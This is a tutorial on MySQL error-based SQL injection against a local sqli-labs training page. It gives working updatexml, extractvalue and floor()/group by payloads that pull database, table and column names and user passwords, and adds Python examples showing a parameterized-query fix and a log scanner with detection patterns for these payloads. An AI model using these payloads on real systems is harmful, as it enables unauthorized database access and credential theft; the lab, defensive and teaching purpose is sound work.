SQL Injection: Error-Based Injection Workflow and Hands-On Practice

Error-based injection workflow:

1. Determine whether an injection point exists.
2. Construct syntactically invalid input so that the database raises an error.
3. Use an error-producing function: updatexml, extractvalue, floor(), exp(), and so on.

SQL error-based injection: why extractvalue and updatexml raise errors:
Reposted from: https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html?spm=a2c4e.10696291.0.0.4a3c19a4xQumaw

Ten methods of error-based injection:
Reposted from: https://www.cnblogs.com/wocalieshenmegui/p/5917967.html

updatexml: "update" as in updatable, "xml" as in Extensible Markup Language.

Description: returns the XML fragment after the replacement.
It is a function with query capability, and that query capability is what the injection uses.
Payload:
updatexml(xml_document, Xpathstring, new_value)
Extract the database name:

0x3a (a colon) is used because it is a syntax error in XPath, which forces the error message to echo the concatenated value.
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x3a,database(),0x3a),1) --+
Extract the table names:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+
Extract the column names:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
Extract the data:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(id,0x7e,username,0x7e,password) from security.users),0x7e),1) --+
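The payloads above only work because Less-2 pastes the id parameter into the statement text and then echoes the database's error message back to the client. As an added example (not from the original post), the following Python script reproduces that pattern next to its fix. It uses SQLite in place of MySQL, which is an assumption of this example: SQLite has no updatexml() or database() function, so the concatenated query fails at parse time with an error that names the injected function, while the bound version compares the whole string as a value and simply returns no row. The users table and its rows are constructed here and only mirror the lab's security.users table in shape.

```python
import sqlite3

# Constructed sample rows standing in for the sqli-labs "security.users" table the
# page queries (assumption: the real lab data is not reproduced here).
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]

# The page's first updatexml payload, as it arrives in the id parameter
# (the trailing "--+" of the URL decodes to "-- ", an end-of-line comment).
ERROR_BASED_PAYLOAD = "1 and updatexml(1,concat(0x3a,database(),0x3a),1) -- "


def make_db():
    """In-memory SQLite database with a users(id, username, password) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors the Less-2 pattern: the id parameter is pasted into the SQL text
    and the raw database error is returned to the client."""
    sql = "SELECT username FROM users WHERE id=" + user_id + " LIMIT 1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Echoing the driver's message is the side channel error-based injection reads.
        return "error: " + str(exc)
    return row[0] if row else None


def lookup_parameterized(conn, user_id):
    """Hardened version: the value is bound through a placeholder, so the parser only
    ever sees 'id=?' and the whole string is compared as data; errors are not echoed."""
    try:
        row = conn.execute(
            "SELECT username FROM users WHERE id=? LIMIT 1", (user_id,)
        ).fetchone()
    except sqlite3.Error:
        # Log the real exception server-side; the client gets nothing database-specific.
        return "error: internal error"
    return row[0] if row else None


def demo():
    """Run both lookups with a normal id and with the page's payload."""
    conn = make_db()
    return {
        "vulnerable_normal": lookup_vulnerable(conn, "1"),
        "vulnerable_payload": lookup_vulnerable(conn, ERROR_BASED_PAYLOAD),
        "parameterized_normal": lookup_parameterized(conn, "1"),
        "parameterized_payload": lookup_parameterized(conn, ERROR_BASED_PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

Two things carry over to a real deployment: binding the value (or, for a numeric id, converting it to an integer before the query) keeps the parser from ever seeing the injected expression, and never relaying the driver's message to the client removes the channel that updatexml, extractvalue and floor() all depend on.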

extractvalue:

Description: extracts a value from an XML string using XPath notation.
xml_document: the XML markup
Xpathstring: the XPath string; this is where the injected statement goes, and its value is shown in the error
new_value: the new value (this is the third argument of updatexml; extractvalue itself takes only the first two)

Extract the database name:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat(database())))
Extract the table names:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat((select group_concat(table_name) from information_schema.tables where table_schema='security'))))
Extract the column names:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
Extract the data:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(id,0x7e,username,0x7e,password) from security.users)))

floor() error-based injection:

https://www.cnblogs.com/litlife/p/8472323.html explains floor() in detail.

Strictly speaking, the error comes from the conflict between floor(), count() and GROUP BY.

Extract the database name:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from(select count(*),concat(database(),0x7e,floor(rand(0)*2))x from information_schema.tables group by x) a)

Extract the table names:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat('~',(select table_name from information_schema.tables where table_schema='security' limit 3,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a)b) --+

Extract the column names:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat('~',(select column_name from information_schema.columns where table_schema='security' limit 5,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a)b) --+

Extract the data:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat('~',(select concat(username,";",password,";") from security.users limit 5,1),floor(rand(0)*2))x from security.users group by x)a)
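From the detection side, every payload on this page carries the same tells in the request line: a call to updatexml( or extractvalue(, or floor(rand( followed by group by, usually together with the 0x7e/0x3a delimiters and a read of information_schema. As an added example (not from the original post), the Python script below scans web-server access-log lines for those signatures after URL-decoding the request target. The log lines, IP addresses, timestamps and rule names are all constructed for this example; the three injected requests reuse the page's own payloads in URL-encoded form.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the page) in common log format. Lines 2-4 carry
# the page's updatexml, extractvalue and floor()/group by payloads URL-encoded; the last
# line is benign traffic that happens to contain the words "floor" and "xml".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-2/?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-2/?id=1%20and%20updatexml(1,concat(0x3a,database(),0x3a),1)%20--+ HTTP/1.1" 200 731
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-2/?id=1%20and%20extractvalue(1,concat(0x7e,concat(database()))) HTTP/1.1" 200 728
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli/Less-2/?id=1%20and%20(select%201%20from(select%20count(*),concat(database(),0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)%20a) HTTP/1.1" 200 744
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=floor+plans+for+xml+updates HTTP/1.1" 200 2048
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Strong indicators: the error-producing calls themselves. Weak indicators: the 0x7e/0x3a
# delimiters and the catalogue the payloads read; reported only alongside a strong hit,
# so a URL that merely contains a hex literal does not alert on its own.
STRONG = {
    "updatexml_call": re.compile(r"\bupdatexml\s*\(", re.I),
    "extractvalue_call": re.compile(r"\bextractvalue\s*\(", re.I),
    "floor_rand_groupby": re.compile(r"\bfloor\s*\(\s*rand\s*\(.*?\bgroup\s+by\b", re.I | re.S),
}
WEAK = {
    "hex_delimiter": re.compile(r"\b0x(?:7e|3a)\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
}


def decode_target(target, rounds=3):
    """URL-decode repeatedly (bounded) so single and double encoding normalise the same way."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(target):
    """Return the names of matching rules, or [] when no strong indicator is present."""
    text = decode_target(target)
    strong = [name for name, rx in STRONG.items() if rx.search(text)]
    if not strong:
        return []
    weak = [name for name, rx in WEAK.items() if rx.search(text)]
    return strong + weak


def scan_log(text):
    """Return one alert dict per request whose target matches an error-based injection signature."""
    alerts = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a parseable request line; skip rather than guess
        rules = classify(m.group("target"))
        if rules:
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"),
                           "target": decode_target(m.group("target")), "rules": rules})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["ts"], ", ".join(alert["rules"]))
        print("   ", alert["target"])
```

The decoding step matters: the `--+` and `%20` in the page's payloads only become `-- ` and spaces after unquoting, and the regexes are written against the decoded form. In a real pipeline the same rules apply to POST bodies and to the database's own error log, where a message containing "XPATH syntax error" next to a ~-delimited value is the server-side counterpart of these requests.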

If the output is truncated:

substring(database(),5,10)

*substring is a string-slicing function: substring(string, 5, 10) takes ten characters from string, starting at its fifth character.*
